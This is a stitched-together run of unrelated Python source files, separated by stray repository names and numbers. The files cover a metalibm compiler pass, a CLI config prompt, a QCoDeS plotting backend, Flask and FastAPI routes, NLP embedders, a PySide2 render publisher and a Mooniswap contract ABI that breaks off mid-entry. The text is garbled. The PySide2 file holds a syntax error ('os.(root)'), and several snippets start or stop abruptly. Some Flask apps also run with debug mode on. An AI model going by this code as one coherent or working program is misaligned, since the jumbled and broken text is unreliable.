Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. ############################################################################### """ Optimization pass which unify pipeline stage id to nodes with undefined id value """ from metalibm_core.utility.log_report import Log from metalibm_core.core.passes import OptreeOptimization, Pass from metalibm_core.core.ml_operations import ML_LeafNode ############################################################################### # PASS DESCRIPTION: # The pass implemented in this file processes an optree and legalize every # supported node # the output format ############################################################################### def optree_set_undefined_stage(optree, stage_id): """ Define the init stage id for node optree if no stage has been previously define (value was None) """ if optree.attributes.init_stage is None: optree.attributes.init_stage = stage_id return optree.attributes.init_stage def unify_stages_rec(optree, stage_id=None, memoization_map=None): """ Recursively propagate a defined stage id to node starting from optree """ memoization_map = {} if memoization_map is None else memoization_map # looking into memoization map if optree in memoization_map: return optree # setting stage id if undefined or updating stage_id value stage_id = optree_set_undefined_stage(optree, stage_id) if isinstance(optree, ML_LeafNode): pass else: for op_input in optree.get_inputs(): unify_stages_rec(op_input, stage_id, memoization_map) memoization_map[optree] = stage_id class Pass_UnifyPipelineStages(OptreeOptimization): """ implementation of pipeline stage uniformisation """ pass_tag = "unify_pipeline_stages" def __init__(self, target): """ pass initialization """ OptreeOptimization.__init__(self, "unify_pipeline_stages", target) def execute(self, optree): """ pass execution """ return unify_stages_rec(optree, {}) # register pass Log.report( Log.Info, "Registering {} pass".format(Pass_UnifyPipelineStages.pass_tag) ) Pass.register(Pass_UnifyPipelineStages) clb6/jarvis-cli import os from collections import namedtuple from jarvis_cli import config from jarvis_cli.exceptions import JarvisPromptError def _prompt_config_value(config_map, title, set_func, default): while True: answer = input("{0} [{1}]: ".format(title, default)) or default if "directory" in title and not os.path.exists(answer): raise JarvisPromptError("Directory {0} does not exist".format(answer)) try: set_func(config_map, answer) break except TypeError as e: print("Not a valid value. Try again.") def prompt_init_config(environment, config_path): ConfigParam = namedtuple("ConfigParam", ["title", "set_func", "default"]) config_params = [ ConfigParam("Your name", config.set_author, os.getlogin()), ConfigParam("Jarvis api url", config.set_api_url, "http://localhost"), ConfigParam("Jarvis api username", config.set_api_user, ""), ConfigParam("Jarvis api password", config.set_api_password, ""), ConfigParam("Jarvis api data directory", config.set_jarvis_data_directory, "/opt/jarvis"), ConfigParam("Jarvis API snapshots directory", config.set_jarvis_snapshots_directory, config.JARVIS_CLI_DEFAULT_SNAPSHOTS_DIR) ] with config.create_config(environment, config_path) as config_map: for cp in config_params: _prompt_config_value(config_map, cp.title, cp.set_func, cp.default) from .middleware import DjangoDebugMiddleware from .types import DjangoDebug __all__ = ['DjangoDebugMiddleware', 'DjangoDebug'] 0 # source : https://github.com/yunjey/pytorch-tutorial # source : https://github.com/andrewliao11/dni.pytorch # source : https://towardsdatascience.com/multi-layer-perceptron-usingfastai-and-pytorch-9e401dd288b8src/__init__.py from .annotations import * from .widgets import * from fastapi import APIRouter router = APIRouter() @router.get("/ping") async def pong(): # some async operation could happen here return {"ping": "pong!"} #!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Python字典里面不能有列表 TypeError: unhashable type: 'list' """ # d1 = {} # d2 = {3: 5} # d3 = {[1, 2, 3]: 'user'} # d4 = {(1, 2, 3): 'user'} # # print(type(d4)) # a = 10 # 局部变量,仅在本模块或类中使用,不能在函数内部以及外部使用 # def set_a(): # a = 100 # 函数变量,内部变量,仅在函数内有效 # set_a() # print(a) # a=10 # global a # 声明a为全局变量,全局变量重新赋值需要声明,调用需要导入 # http协议头部字段,并说明每个字段的主要作用 # 堆内存和栈内存的区别 # -*- coding: utf-8 -*- # # Copyright (C) 2021 CERN. # # Invenio-Drafts-Resources is free software; you can redistribute it and/or # modify it under the terms of the MIT License; see LICENSE file for more # details. """Celery tasks to manage drafts.""" from datetime import timedelta from celery import shared_task from invenio_records_resources.proxies import current_service_registry @shared_task(ignore_result=True) def cleanup_drafts(seconds=3600): """Hard delete of soft deleted drafts. :param int seconds: numbers of seconds that should pass since the last update of the draft in order to be hard deleted. """ timedelta_param = timedelta(seconds=seconds) service = current_service_registry.get("rdm-records") service.cleanup_drafts(timedelta_param) import numpy as np import time import os try: import ipywidgets as ipw from IPython.display import display except: print('Ipywidgets not loaded!') import qcodes as qc from qcodes.plots.pyqtgraph import QtPlot from qcodes.dataset.measurements import Measurement from pysweep.databackends.base import DataParameter, DataParameterFixedSweep, DataParameterFixedAxis from pytopo.qctools.dataset2 import select_experiment import pysweep.databackends.base as base import pysweep.databackends.qcodes as qcodes_backend ''' A subclassed qcodes DataBackend, that makes live plots of 1D and 2D data. For higher dimentionality use ordinary qcodes DataBackend. ''' class DataBackend(qcodes_backend.DataBackend): def __init__(self, experiment_name, sample, station, plotting_interval: float=3, export_png=True, progress_bar=False, close_when_finished=False): ''' This is a PycQED-inspired subclass of qcodes data backend that adds 1D and 2D live plotting functionality. The backend uses QtPlot from QCoDeS for live plotting. Since plotting runs in the same thread as the measurement it introduces an overhead that comes from opening of the windows with plots and updating them. With plotting_interval=3 (seconds) overhead in measurement is relatively small (~10%). The backend has an option of outputting a PNG image at the end of the measurement. The figures are saved in subdirectories of the folder where database is saved. Plots titles contain information allowing to easily identify which database the data was saved in and where in the database the data is saved. At this time only 1D and 2D datasets and only point-by-point measurements are supported. 2D datasets will show correctly only if they are on a regular grid. Increasing generality is on TODO list. ''' self.plotting_interval = plotting_interval self.export_png = export_png self.progress_bar = progress_bar self.close_when_finished = close_when_finished self.experiment = select_experiment(experiment_name, sample) measurement = Measurement(self.experiment, station) super().__init__(measurement) def setup(self, paramstructure, dict_waterfall): super().setup(paramstructure, dict_waterfall) # distinguish between independent and dependent parameters # (coordinates and quantities, respectively) self.soft_sweeped_coordinates = [] self.hard_sweeped_coordinates = [] self.quantities = [] parameter_index = 0 for param in paramstructure: if isinstance(param, DataParameterFixedAxis): if ('None' in param.name) and (param.unit is 'e'): parameter_index += 1 continue self.hard_sweeped_coordinates.append({'name': param.name, 'unit': param.unit, 'coordinates': param.coordinates, 'independent': param.independent}) elif isinstance(param, DataParameterFixedSweep): if ('None' in param.name) and (param.unit is 'e'): parameter_index += 1 continue self.soft_sweeped_coordinates.append({'name': param.name, 'unit': param.unit, 'start': param.start, 'end': param.stop, 'size': param.npoints, 'independent': param.independent}) else: self.quantities.append({'name': param.name, 'unit': param.unit, 'type': param.paramtype, 'index': parameter_index, 'extra_dependencies': param.extra_dependencies}) parameter_index += 1 # to account for the parameter of # the innermost loop stored in the last column self.soft_sweeped_coordinates.reverse() self.hard_sweeped_coordinates.reverse() self.create_plots() if self.progress_bar: self.create_progress_bar() def __enter__(self): super().__enter__() # read database name and identifiers allowing # to locate the dataset in the database exp_name = self.runner.ds.exp_name run_id = self.runner.ds.run_id db_name = self.runner.ds.path_to_db.split('\\')[-1].split('.')[0] timestamp = self.runner.ds.run_timestamp() self.time = timestamp.split(' ')[1].replace(':','-') # add titles to plots for i, quantity in enumerate(self.quantities): title_list = [] title_list.append(quantity['name']) # title_list.append(exp_name) title_list.append(str(run_id)) title_list.append(db_name) title_list.append(timestamp) plot_title = ', '.join(title_list) quantity['plot'].subplots[0].setTitle(plot_title, size='7pt',color='000000') # create a directory for figures if self.export_png: fmt = '.'.join(self.runner.ds.path_to_db.split('.')[:-1]) fmt = fmt+'\\{date}\\{time}' fmt = fmt.replace('\\', '/') try: self.io = qc.DiskIO('.') except AttributeError: self.io = qc.data.DiskIO('.') loc_provider = qc.data.location.FormatLocation( fmt=fmt) self.directory_prefix = loc_provider(self.io) self.directory_prefix = '/'.join(self.directory_prefix.split('/')[:-1]) print(self.directory_prefix ) try: os.makedirs(self.directory_prefix) except FileExistsError: pass # a counter used to select where the new data point # should be inserted self.point_counter = 0 # initialize timer for live update self.last_update_time = time.time() return self def __exit__(self, exc_type, exc_val, exc_tb): super().__exit__(exc_type, exc_val, exc_tb) # at the end update the plots for the last time # and export figures for qi, quantity in enumerate(self.quantities): quantity['plot'].update_plot() if self.progress_bar: self.update_progress_bar() if self.export_png: run_id = self.runner.ds.run_id filename = '/'.join([self.directory_prefix, str(run_id)+'_'+self.time+'_'+quantity['name']+'.png']) quantity['plot'].save(filename=filename) if self.close_when_finished: quantity['plot'].win.close() del quantity['plot'] def add_to_line(self, line): super().add_to_line(line) for qi, quantity in enumerate(self.quantities): # case for the measured data that is returned point-by-point if quantity['type'] == 'numeric': # 1D measurement if len(self.soft_sweeped_coordinates) == 1: quantity['xvals'][self.point_counter] = line[2][1] quantity['yvals'][self.point_counter] = line[quantity['index']][1] elif len(self.soft_sweeped_coordinates) == 2: x_index = self.point_counter % self.soft_sweeped_coordinates[0]['size'] y_index = int((self.point_counter - x_index)/self.soft_sweeped_coordinates[0]['size']) # commented out because I can't get the irregular grid # to work [FKM], TODO # quantity['xvals'][y_index] = line[1][1] # quantity['yvals'][x_index] = line[2][1] quantity['zvals'][y_index,x_index] = line[quantity['index']][1] # case for the measured data that is returned line-by-line elif quantity['type'] == 'array': # 1D measurement if len(self.soft_sweeped_coordinates) == 0: quantity['yvals'][:] = line[quantity['index']][1][:] # 2D measurement elif len(self.soft_sweeped_coordinates) == 1: quantity['zvals'][:,self.point_counter] = line[quantity['index']][1][:] else: raise NotImplementedError('qcodes_with_qtplot only supports plotting 1D and 2D data') # update plot only every several (self.plotting_interval) # seconds to minimize the overhead if time.time()-self.last_update_time > self.plotting_interval: for qi, quantity in enumerate(self.quantities): quantity['plot'].update_plot() if self.progress_bar: self.update_progress_bar() self.last_update_time = time.time() self.point_counter += 1 def create_plots(self): # open each measured quantity in a separate window # this allows the user to keep only the "interesting" # dataset opened # print(self.quantities) # print(self.soft_sweeped_coordinates) for i, quantity in enumerate(self.quantities): quantity['plot'] = QtPlot(window_title=quantity['name'], figsize=(550, 300), fig_x_position=int(i/3)*0.3, fig_y_position=(i%3)*0.315) # case for the measured data that is returned point-by-point if quantity['type'] == 'numeric': # 1D measurement if len(self.soft_sweeped_coordinates) == 1: coordinate = self.soft_sweeped_coordinates[0] quantity['xvals'] = np.linspace(coordinate['start'], coordinate['end'], coordinate['size']) quantity['yvals'] = np.ones(coordinate['size']) quantity['yvals'][:] = np.NaN quantity['plot'].add(x=quantity['xvals'], y=quantity['yvals'], xlabel=coordinate['name'], xunit=coordinate['unit'], ylabel=quantity['name'], yunit=quantity['unit']) # 2D measurement elif len(self.soft_sweeped_coordinates) == 2: coordinateX = self.soft_sweeped_coordinates[0] coordinateY = self.soft_sweeped_coordinates[1] quantity['xvals'] = np.linspace(coordinateX['start'], coordinateX['end'], coordinateX['size']) quantity['yvals'] = np.linspace(coordinateY['start'], coordinateY['end'], coordinateY['size']) quantity['zvals'] = np.ones([coordinateY['size'], coordinateX['size']]) quantity['zvals'][:,:] = np.NaN quantity['plot'].add(x=quantity['xvals'], y=quantity['yvals'], z=quantity['zvals'], xlabel=coordinateX['name'], xunit=coordinateX['unit'], ylabel=coordinateY['name'], yunit=coordinateY['unit'], zlabel=quantity['name'], zunit=quantity['unit']) else: raise NotImplementedError('qcodes_with_qtplot only' 'supports plotting 1D and 2D data') # case for the measured data that is returned line-by-line elif quantity['type'] == 'array': # 1D measurement if len(self.soft_sweeped_coordinates) == 0: # check if you should use the default dependency # on hard_sweeped coordinate, otherwise find a hard_sweeped # coordinate with a matching name if quantity['extra_dependencies'] == []: coordinate = self.hard_sweeped_coordinates[0] else: for coordinate in self.hard_sweeped_coordinates: if coordinate['name'] == quantity['extra_dependencies'][0]: break quantity['xvals'] = coordinate['coordinates'] quantity['yvals'] = np.ones(coordinate['coordinates'].shape) quantity['yvals'][:] = np.NaN quantity['plot'].add(x=quantity['xvals'], y=quantity['yvals'], xlabel=coordinate['name'], xunit=coordinate['unit'], ylabel=quantity['name'], yunit=quantity['unit']) # 2D measurement elif len(self.soft_sweeped_coordinates) == 1: coordinateX = self.soft_sweeped_coordinates[0] # check if you should use the default dependency # on hard_sweeped coordinate, otherwise find a hard_sweeped # coordinate with a matching name if quantity['extra_dependencies'] == []: coordinateY = self.hard_sweeped_coordinates[0] else: for coordinateY in self.hard_sweeped_coordinates: if coordinateY['name'] == quantity['extra_dependencies'][0]: break quantity['xvals'] = np.linspace(coordinateX['start'], coordinateX['end'], coordinateX['size']) quantity['yvals'] = coordinateY['coordinates'] quantity['zvals'] = np.ones([coordinateY['coordinates'].shape[0], coordinateX['size']]) quantity['zvals'][:,:] = np.NaN quantity['plot'].add(x=quantity['xvals'], y=quantity['yvals'], z=quantity['zvals'], xlabel=coordinateX['name'], xunit=coordinateX['unit'], ylabel=coordinateY['name'], yunit=coordinateY['unit'], zlabel=quantity['name'], zunit=quantity['unit']) else: raise NotImplementedError('qcodes_with_qtplot only' 'supports plotting 1D and 2D data') else: raise NotImplementedError('Unsupported type of data.' ' Must be "numeric" of "array".') def create_progress_bar(self): first_quantity = self.quantities[0] if 'zvals' in first_quantity.keys(): total_datapoints = np.product(first_quantity['zvals'].shape) else: total_datapoints = first_quantity['yvals'].shape[0] self.progress_bar = ipw.FloatProgress(value=0, min=0, max=total_datapoints, description='Progress:') display(self.progress_bar) def update_progress_bar(self): self.progress_bar.value = self.point_counter me-env/me. from me.logger import MeLogger, DEBUG from me.storage import StorageManagerCapsule, DataType from flask import Flask, jsonify from multiprocessing import Process from threading import Thread class BankingAPI: def __init__(self, data: StorageManagerCapsule): self.log = MeLogger(name=__name__, level=DEBUG) self.data_manager = data self.app = Flask(__name__) self._subproc = None self.app.add_url_rule(rule='/', endpoint='root', view_func=self.hello) self.app.add_url_rule(rule='/data', endpoint='data', view_func=self.data) def run(self): self._subproc = Thread(target=lambda: self.app.run(port=5001, debug=True, use_reloader=False)) # FIXME should be a proc not a thread self._subproc.start() def hello(self): return 'Hello, World! (banking service)', 200 def data(self): self.log.info('/data called in', __name__) data = self.data_manager.getAllRows(DataType.TXs) self.log.debug('retrieved data', data) return jsonify(data), 200 bayanistnahtc/seq2struct import abc import functools import os import pickle import time import bpemb import corenlp import nltk import torch import torchtext from pytorch_pretrained_bert import BertTokenizer, BertModel from seq2struct.resources import corenlp from seq2struct.utils import registry class Embedder(metaclass=abc.ABCMeta): @abc.abstractmethod def tokenize(self, sentence): '''Given a string, return a list of tokens suitable for lookup.''' pass @abc.abstractmethod def untokenize(self, tokens): '''Undo tokenize.''' pass @abc.abstractmethod def lookup(self, token): '''Given a token, return a vector embedding if token is in vocabulary. If token is not in the vocabulary, then return None.''' pass @abc.abstractmethod def contains(self, token): pass @abc.abstractmethod def to(self, device): '''Transfer the pretrained embeddings to the given device.''' pass @registry.register('word_emb', 'glove') class GloVe(Embedder): def __init__(self, kind): cache = os.path.join(os.environ.get('CACHE_DIR', os.getcwd()), '.vector_cache') self.glove = torchtext.vocab.GloVe(name=kind, cache=cache) self.dim = self.glove.dim self.vectors = self.glove.vectors @functools.lru_cache(maxsize=1024) def tokenize(self, text): ann = corenlp.annotate(text, annotators=['tokenize', 'ssplit']) return [tok.word.lower() for sent in ann.sentence for tok in sent.token] def untokenize(self, tokens): return ' '.join(tokens) def lookup(self, token): i = self.glove.stoi.get(token) if i is None: return None return self.vectors[i] def contains(self, token): return token in self.glove.stoi def to(self, device): self.vectors = self.vectors.to(device) @registry.register('word_emb', 'bpemb') class BPEmb(Embedder): def __init__(self, dim, vocab_size, lang='en'): self.bpemb = bpemb.BPEmb(lang=lang, dim=dim, vs=vocab_size) self.dim = dim self.vectors = torch.from_numpy(self.bpemb.vectors) def tokenize(self, text): return self.bpemb.encode(text) def untokenize(self, tokens): return self.bpemb.decode(tokens) def lookup(self, token): i = self.bpemb.spm.PieceToId(token) if i == self.bpemb.spm.unk_id(): return None return self.vectors[i] def contains(self, token): return self.lookup(token) is not None def to(self, device): self.vectors = self.vectors.to(device) @registry.register('word_emb', 'tfidfemb') class TFIDF(Embedder): def __init__(self, kind): path = os.path.join(os.environ.get('CACHE_DIR', os.getcwd()), 'seq2struct/resources/tfidf.pkl') self.tfidf = pickle.load(open(path, "rb")) #"~/Documents/synthesis/seq2struct_tfidf/seq2struct/resources/tfidf.pkl" self.dim = len(self.tfidf.vocabulary_) @functools.lru_cache(maxsize=1024) def tokenize(self, text): text = text.replace('[;\", \.]', ' ').lower() return nltk.word_tokenize(text) def untokenize(self, tokens): return ' '.join(tokens) def lookup(self, token): tfidf_vec = self.tfidf.transform([token])[0] return torch.from_numpy(tfidf_vec.toarray()[0]) def contains(self, token): return token in self.tfidf.vocabulary_ def to(self, device): # self.vectors = self.vectors.to(device) pass @registry.register('word_emb', 'bertemb') class BertEmb(Embedder): # # Load pre-trained model (weights) # model = BertModel.from_pretrained('bert-base-uncased') # model.eval() # # # If you have a GPU, put everything on cuda # tokens_tensor = tokens_tensor.to('cuda') # segments_tensors = segments_tensors.to('cuda') # model.to('cuda') # # # Predict hidden states features for each layer # with torch.no_grad(): # encoded_layers, _ = model(tokens_tensor, segments_tensors) # # We have a hidden states for each of the 12 layers in model bert-base-uncased # assert len(encoded_layers) == 12 def __init__(self, kind): self.tokenizer = BertTokenizer.from_pretrained('bert-base-uncased') self.model = BertModel.from_pretrained('bert-base-uncased').cuda(device=torch.device('cuda')) self.model.training = False # cache = os.path.join(os.environ.get('CACHE_DIR', os.getcwd()), '.vector_cache') # self.glove = torchtext.vocab.GloVe(name=kind, cache=cache) self.dim = 768#self.glove.dim # self.vectors = self.glove.vectors # print("Glove tut") self.model.to('cuda') @functools.lru_cache(maxsize=1024) def tokenize(self, text): return self.tokenizer.tokenize(text) def untokenize(self, tokens): return ' '.join(tokens) def lookup(self, token): if token not in self.tokenizer.vocab: return None encoded = self.tokenizer.convert_tokens_to_ids([token]) return self.model(torch.cuda.LongTensor([encoded]))[0][0].reshape([768]) def contains(self, token): return self.tokenizer.vocab.__contains__(token) def to(self, device): self.vectors = self.vectors.to(device) from django.db import models from django.contrib import auth from resources.models import Resource class Comment(models.Model): author = models.ForeignKey(auth.models.User) resource = models.ForeignKey(Resource, related_name="comments") content = models.TextField(null=False, blank=False) date_created = models.DateTimeField(auto_now_add=True) date_modified = models.DateTimeField(auto_now=True) def __str__(self): return self.content # -*- coding: utf-8 -*- import sys import os import re import pprint import time from PySide2 import QtCore as qtc from PySide2 import QtGui as qtg from PySide2 import QtWidgets as qtw from PySide2 import QtQml as qml CURRENT_DIR = os.path.dirname(os.path.abspath(__file__)) # Some example regex used to filter the files ACCEPTED_EXTENSIONS_REGEX = re.compile(r'(\w+)\.(\w+)\.(exr|tiff|png|dpx)') RENDER_LAYER_REGEX = re.compile(r'\w+_\w+_v\d{3}') pp = pprint.PrettyPrinter(indent=4) def fit_range(x, inmin, inmax, outmin, outmax): """Maps a value from an interval to another Args: x (int or float): the input value inmin (int or float): The minimum of the input range inmax (int or float): The maximum of the input range outmin (int or float): The minimum of the desired range outmax (int or float): The maximum of the desired range Returns: int or float: the computed value """ return (x-inmin) * (outmax-outmin) / (inmax-inmin) + outmin class PublishComponentsSignals(qtc.QObject): completed = qtc.Signal(list) error = qtc.Signal(str) progress = qtc.Signal(float) class PublishComponentsThread(qtc.QRunnable): def __init__(self, assetsdata): super(PublishComponentsThread, self).__init__() self.signals = PublishComponentsSignals() self.assets_data = assetsdata def run(self): published_assets = [] for i, asset in enumerate(self.assets_data): progress = fit_range(i, 0, len(self.assets_data) - 1, 0.05, 1.0) print 'progress: {}'.format(progress) time.sleep(1) published_assets.append(asset['assetName']) self.signals.progress.emit(progress) self.signals.completed.emit(published_assets) class Backend(qtc.QObject): dataRetrieved = qtc.Signal('QVariantList') publishProgress = qtc.Signal(float) publishCompleted = qtc.Signal('QVariantList') def __init__(self): super(Backend, self).__init__() @qtc.Slot(str, 'QVariantList') def publish(self, dept, assetsdata): print 'publish()' print 'dept:' print dept print 'data:' pp.pprint(assetsdata) print fit_range(5.0, 0.0, 10.0, 0.0, 1.0) print fit_range(1.0, 0.0, 10.0, 0.0, 1.0) print fit_range(9.0, 0.0, 10.0, 0.0, 1.0) print fit_range(100.0, 0.0, 100.0, 0.0, 1.0) print fit_range(33.0, 0.0, 50.0, 0.0, 1.0) publish_thread = PublishComponentsThread(assetsdata) publish_thread.signals.completed.connect(self.on_publish_completed) publish_thread.signals.progress.connect(self.on_publish_progress) qtc.QThreadPool.globalInstance().start(publish_thread) def on_publish_progress(self, value): self.publishProgress.emit(value) def on_publish_completed(self, assets): self.publishCompleted.emit(assets) @qtc.Slot('QVariant') def parseDraggedFiles(self, urllist): print 'parseDraggedFile()' print urllist render_layers = {} for url in urllist: print url.path() current_asset = None for root, dirnames, filenames in os.walk(url.path()): # Workaround for a MacOS bug of os.path.basename current_root = root[:-1] if root.endswith('/') else root dir_name = os.path.basename(current_root) if RENDER_LAYER_REGEX.match(dir_name): current_asset = dir_name print 'current_asset: {}'.format(current_asset) if current_asset not in render_layers and current_asset is not None: render_layers[current_asset] = {} render_layers[current_asset]['assetName'] = current_asset render_layers[current_asset]['assetIsChecked'] = True render_layers[current_asset]['assetComponents'] = [] frames = sorted( filter(lambda f: ACCEPTED_EXTENSIONS_REGEX.match(f), filenames)) if frames: first_frame_num = re.findall(r'\d+', os.path.basename(frames[0]))[0] end_frame_num = re.findall(r'\d+', os.path.basename(frames[-1]))[0] pass_name = os.(root) frame_name = frames[0].split('.')[0] frame_ext = frames[0].split('.')[-1] print 'frame name: %s' % frame_name padding = '#' * len(first_frame_num.split('.')[-1]) render_layers[current_asset]['assetComponents'].append({ 'passName': pass_name, 'startFrame': first_frame_num, 'endFrame': end_frame_num, 'path': '%s.%s.%s' % (frame_name, padding, frame_ext), 'passIsChecked': True }) # pp.pprint(render_layers) returned_layers = [] for asset_name, asset_dict in render_layers.iteritems(): returned_layers.append(asset_dict) # pp.pprint(returned_layers) self.dataRetrieved.emit( sorted(returned_layers, key=lambda e: e['assetName'])) def main(): # sys.argv += ['--style', 'material'] app = qtg.QGuiApplication(sys.argv) engine = qml.QQmlApplicationEngine() backend = Backend() engine.rootContext().setContextProperty('backend', backend) engine.load(qtc.QUrl(os.path.join(CURRENT_DIR, 'main.qml'))) if not engine.rootObjects: sys.exit(-1) sys.exit(app.exec_()) if __name__ == '__main__': main() 0 import datetime import time def now_ts(): return int(round(datetime.datetime.now().timestamp())) def ts2str(ts, format='%Y-%m-%d %H:%M:%S'): return time.strftime(format, time.localtime(ts)) def str2ts(s, format='%Y-%m-%d %H:%M:%S'): return int(time.mktime(time.strptime(s, format))) 0 from flask import Flask, render_template, Response app = Flask(__name__) @app.route('/') def index(): return render_template("index.html") @app.route('/fighting') def fighting(): return render_template("fighting.html") @app.route('/moba') def moba(): return render_template("moba.html") @app.route('/platforming') def platforming(): return render_template("platforming.html") @app.route('/racing') def racing(): return render_template("racing.html") @app.route('/rpg') def rpg(): return render_template("rpg.html") @app.route('/shooter') def shooter(): return render_template("shooter.html") if __name__ == "__main__": app.run(host='0.0.0.0', debug=True) 10-100 mooniswap_abi = [ { "inputs": [ {"internalType": "contract IERC20", "name": "_token0", "type": "address"}, {"internalType": "contract IERC20", "name": "_token1", "type": "address"}, {"internalType": "string", "name": "name", "type": "string"}, {"internalType": "string", "name": "symbol", "type": "string"}, { "internalType": "contract IMooniswapFactoryGovernance", "name": "_mooniswapFactoryGovernance", "type": "address", }, ], "stateMutability": "nonpayable", "type": "constructor", }, { "anonymous": False, "inputs": [ { "indexed": True, "internalType": "address", "name": "owner", "type": "address", }, { "indexed": True, "internalType": "address", "name": "spender", "type": "address", }, { "indexed": False, "internalType": "uint256", "name": "value", "type": "uint256", }, ], "name": "Approval", "type": "event", }, { "anonymous": False, "inputs": [ { "indexed": True, "internalType": "address", "name": "user", "type": "address", }, { "indexed": False, "internalType": "uint256", "name": "decayPeriod", "type": "uint256", }, { "indexed": False, "internalType": "bool", "name": "isDefault", "type": "bool", }, { "indexed": False, "internalType": "uint256", "name": "amount", "type": "uint256", }, ], "name": "DecayPeriodVoteUpdate", "type": "event", }, { "anonymous": False, "inputs": [ { "indexed": True, "internalType": "address", "name": "sender", "type": "address", }, { "indexed": True, "internalType": "address", "name": "receiver", "type": "address", }, { "indexed": False, "internalType": "uint256", "name": "share", "type": "uint256", }, { "indexed": False, "internalType": "uint256", "name": "token0Amount", "type": "uint256", }, { "indexed": False, "internalType": "uint256", "name": "token1Amount", "type": "uint256", }, ], "name": "Deposited", "type": "event", }, { "anonymous": False, "inputs": [ { "indexed": False, "internalType": "string", "name": "reason", "type": "string", } ], "name": "Error", "type": "event", }, { "anonymous": False, "inputs": [ { "indexed": True, "internalType": "address", "name": "user", "type": "address", }, { "indexed": False, "internalType": "uint256", "name": "fee", "type": "uint256", }, { "indexed": False, "internalType": "bool", "name": "isDefault", "type": "bool", }, { "indexed": False, "internalType": "uint256", "name": "amount", "type": "uint256", }, ], "name": "FeeVoteUpdate", "type": "event", }, { "anonymous": False, "inputs": [ { "indexed": True, "internalType": "address", "name": "previousOwner", "type": "address", }, { "indexed": True, "internalType": "address", "name": "newOwner", "type": "address", }, ], "name": "OwnershipTransferred", "type": "event", }, { "anonymous": False, "inputs": [ { "indexed": True, "internalType": "address", "name": "user", "type": "address", }, { "indexed": False, "internalType": "uint256", "name": "slippageFee", "type": "uint256", }, { "indexed": False, "internalType": "bool", "name": "isDefault", "type": "bool", }, { "indexed": False, "internalType": "uint256", "name": "amount", "type": "uint256", }, ], "name": "SlippageFeeVoteUpdate", "type": "event", }, { "anonymous": False, "inputs": [ { "indexed": True, "internalType": "address", "name": "sender", "type": "address", }, { "indexed": True, "internalType": "address", "name": "receiver", "type": "address", }, { "indexed": True, "internalType": "address", "name": "srcToken", "type": "address", }, { "indexed": False, "internalType": "address", "name": "dstToken", "type": "address", }, { "indexed": False, "internalType": "uint256", "name": "amount", "type": "uint256", }, { "indexed": False, "internalType": "uint256", "name": "result", "type": "uint256", }, { "indexed": False, "internalType": "uint256", "name": "srcAdditionBalance", "type": "uint256", }, { "indexed": False, "internalType": "uint256", "name": "dstRemovalBalance", "type": "uint256", }, { "indexed": False, "internalType": "address", "name": "referral", "type": "address", }, ], "name": "Swapped", "type": "event", }, { "anonymous": False, "inputs": [ { "indexed": False, "internalType": "uint256", "name": "srcBalance", "type": "uint256", }, { "indexed": False, "internalType": "uint256", "name": "dstBalance", "type": "uint256", }, { "indexed": False, "internalType": "uint256", "name": "fee", "type": "uint256", }, { "indexed": False, "internalType": "uint256", "name": "slippageFee", "type": "uint256", }, { "indexed": False, "internalType": "uint256", "name": "referralShare", "type": "uint256", }, { "indexed": False, "internalType": "uint256", "name": "governanceShare", "type": "uint256", }, ], "name": "Sync", "type": "event", }, { "anonymous": False, "inputs": [ { "indexed": True, "internalType": "address", "name": "from", "type": "address", }, { "indexed": True, "internalType": "address", "name": "to", "type": "address", }, { "indexed": False, "internalType": "uint256", "name": "value", "type": "uint256", }, ], "name": "Transfer", "type": "event", }, { "anonymous": False, "inputs": [ { "indexed": True, "internalType": "address", "name": "sender", "type": "address", }, { "indexed": True, "internalType": "address", "name": "receiver", "type": "address", }, { "indexed": False, "internalType": "uint256", "name": "share", "type": "uint256", }, { "indexed": False, "internalType": "uint256", "name": "token0Amount", "type": "uint256", }, { "indexed": False, "internalType": "uint256", "name": "token1Amount", "type": "uint256", }, ], "name": "Withdrawn", "type": "event", }, { "inputs": [ {"internalType": "address", "name": "owner", "type": "address"}, {"internalType": "address", "name": "spender", "type": "address"}, ], "name": "allowance", "outputs": [{"internalType": "uint256", "name": "", "type": "uint256"}], "stateMutability": "view", "type": "function", }, { "inputs": [ {"internalType": "address", "name": "spender", "type": "address"}, {"internalType": "uint256", "name": "amount", "type": "uint256"}, ], "name": "approve", "outputs": [{"internalType": "bool", "name": "", "type": "bool"}], "stateMutability": "nonpayable", "type": "function", }, { "inputs": [{"internalType": "address", "name": "account", "type": "address"}], "name": "balanceOf", "outputs": [{"internalType": "uint256", "name": "", "type": "uint256"}], "stateMutability": "view", "type": "function", }, { "inputs": [], "name": "decayPeriod", "outputs": [{"internalType": "uint256", "name": "", "type": "uint256"}], "stateMutability": "view", "type": "function", }, { "inputs": [{"internalType": "uint256", "name": "vote", "type": "uint256"}], "name": "decayPeriodVote", "outputs": [], "stateMutability": "nonpayable", "type": "function", }, { "inputs": [{"internalType": "address", "name": "user", "type": "address"}], "name": "decayPeriodVotes", "outputs": [{"internalType": "uint256", "name": "", "type": "uint256"}], "stateMutability": "view", "type": "function", }, { "inputs": [], "name": "decimals", "outputs": [{"internalType": "uint8", "name": "", "type": "uint8"}], "stateMutability": "view", "type": "function", }, { "inputs": [ {"internalType": "address", "name": "spender", "type": "address"}, {"internalType": "uint256", "name": "subtractedValue", "type": "uint256"}, ], "name": "decreaseAllowance", "outputs": [{"internalType": "bool", "name": "", "type": "bool"}], "stateMutability": "nonpayable", "type": "function", }, { "inputs": [ {"internalType": "uint256[2]", "name": "maxAmounts", "type": "uint256[2]"}, {"internalType": "uint256[2]", "name": "minAmounts", "type": "uint256[2]"}, ], "name": "deposit", "outputs": [ {"internalType": "uint256", "name": "fairSupply", "type": "uint256"}, { "internalType": "uint256[2]", "name": "receivedAmounts", "type": "uint256[2]", }, ], "stateMutability": "payable", "type": "function", }, { "inputs": [ {"internalType": "uint256[2]", "name": "maxAmounts", "type": "uint256[2]"}, {"internalType": "uint256[2]", "name": "minAmounts", "type": "uint256[2]"}, {"internalType": 